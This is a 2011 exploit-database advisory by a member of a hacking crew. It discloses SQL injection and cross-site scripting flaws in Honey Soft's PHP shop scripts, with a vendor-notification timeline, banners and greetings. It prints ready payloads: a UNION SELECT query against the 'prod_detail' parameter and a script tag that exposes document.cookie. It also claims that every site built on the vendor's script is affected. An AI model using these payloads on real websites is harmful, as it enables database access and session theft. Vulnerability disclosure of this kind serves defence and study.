Exploit Honey Soft Web Solution - Multiple Vulnerabilities

[Exploiter]

EDB-ID

17055

Проверка EDB

1. Пройдено

Автор

**ROAD_KILLER**

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

N/A

Дата публикации

2011-03-28

-----------------------------------------------------------------------------------------
 Honey Soft   (detail.php?prod_detail=  & products.php?catid=)   SQL-i/XSS Multiple Vulnerabilities
-----------------------------------------------------------------------------------------
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
+=+=+=                                                                        +=+=+=
+=+=+=     /\  | |  | |            ________    _____    _____ __    _    __   +=+=+=
+=+=+=    /  \ | |__| |    _____  / ______/   |  _  \  | ____|\ \  / \  / /   +=+=+=
+=+=+=   / /\ \| |__| |  /_____/  | |         | |_) /  | |__   \ \/   \/ /    +=+=+=
+=+=+=  / ____ \ |  | |           | |_______  | __\ \  |  __|   \       /     +=+=+=
+=+=+= /_/    \_\|  | |           |________/  |_|  \_\ | |_______\_____/_____ +=+=+=
+=+=+=                                                 |_____________________|+=+=+=
+=+=+=                                                                        +=+=+= 
+=+=+=  X-n3t - **RoAd_KiLlEr** - The|Denny` - EaglE EyE - The_1nv1s1bl3      +=+=+=
+=+=+=                                                                        +=+=+= 
+=+=+=  0ne Nation , 0ne People , 0ne Culture , 0ne Language = Ethnic Albania +=+=+= 
+=+=+=                                                                        +=+=+=
+=+=+=           ....::: | ALBANIAN HACKING CREW | :::....        2011        +=+=+=
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
0                                                                      0
1                ###########################################           1
0               I'm **RoAd_KiLlEr**  member from 1337 DAY Team         1
1                ###########################################           0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+]Title        Honey Soft   (detail.php?prod_detail=  & products.php?catid=)   SQL-i/XSS Multiple Vulnerabilities
[+]Author        **RoAd_KiLlEr**
[+]Tested on     Win Xp Sp 2/3
---------------------------------------------------------------------------
[~] Founded by **RoAd_KiLlEr**
[~] Team: Albanian Hacking Crew
[~] Contact: sukihack[at]gmail[dot]com 
[~] Home: http://1337day.com
[~] Vendor: http://www.honeysoft.net/

==========ExPl0iT3d by **RoAd_KiLlEr**==========



[+] Dork: No DOrk for Lamerz !!

==========================================





[ I ].  SQL-i Vulnerability
=+=+=+=+=+=+=+=+=+



[+] Description:




All the web sites that are developed by Honeysoft use the same script.
But the script is prone to SQL inection.
Input passed via the "prod_detail" parameter to detail.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
==========================================





[P0C]:  http://127.0.0.1/path/detail.php?prod_detail=[SQL-Injection] 



[D3m0]:  http://127.0.0.1/path/detail.php?prod_detail=[SQL-Injection]


[L!v3 D3m0]: http://www.site.com/detail.php?prod_detail=369+union+select+1,2,3,4,@@version,6--







[ II ].  XSS-Injection Vulnerability
=+=+=+=+=+=+=+=+=+=+=+=+



[+] Description:


Input passed via the "prod_detail=" parameter to detail.php and via the "products.php?catid=" parameter to products.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
=========================================================

[P0C]:  http://127.0.0.1/path/detail.php?prod_detail=[XSS]


[Atack Pattern]: "><script>alert(document.cookie)</script>


[L!v3 D3m0]: http://www.site.com/detail.php?prod_detail="><script>alert(document.cookie)</script>




[+] TIME TABLE:
 
26 March 2011 - Vulnerability discovered.
26 March 2011 - Vendor Notified.
26 March 2011 - Sent to vendor all data.
27 March 2011 - Vendor replied.
27 March 2011 - Advisory released.


===========================================================================================
[!] Albanian Hacking Crew           
===========================================================================================
[!] **RoAd_KiLlEr**   
===========================================================================================
[!] MaiL: sukihack[at]gmail[dot]com
===========================================================================================
[!] Greetz To : Ton![w]indowS | X-n3t | The|DennY` | THE_1NV1S1BL3 | KHG & All Albanian/Kosova Hackers 
===========================================================================================
[!] Spec Th4nks:  r0073r  | indoushka | Sid3^effects | MaFFiTeRRoR | All  1337day Members | And All My Friendz
===========================================================================================
[!] Red n'black i dress eagle on my chest
It's good to be an ALBANIAN
Keep my head up high for that flag I die
Im proud to be an ALBANIAN
===========================================================================================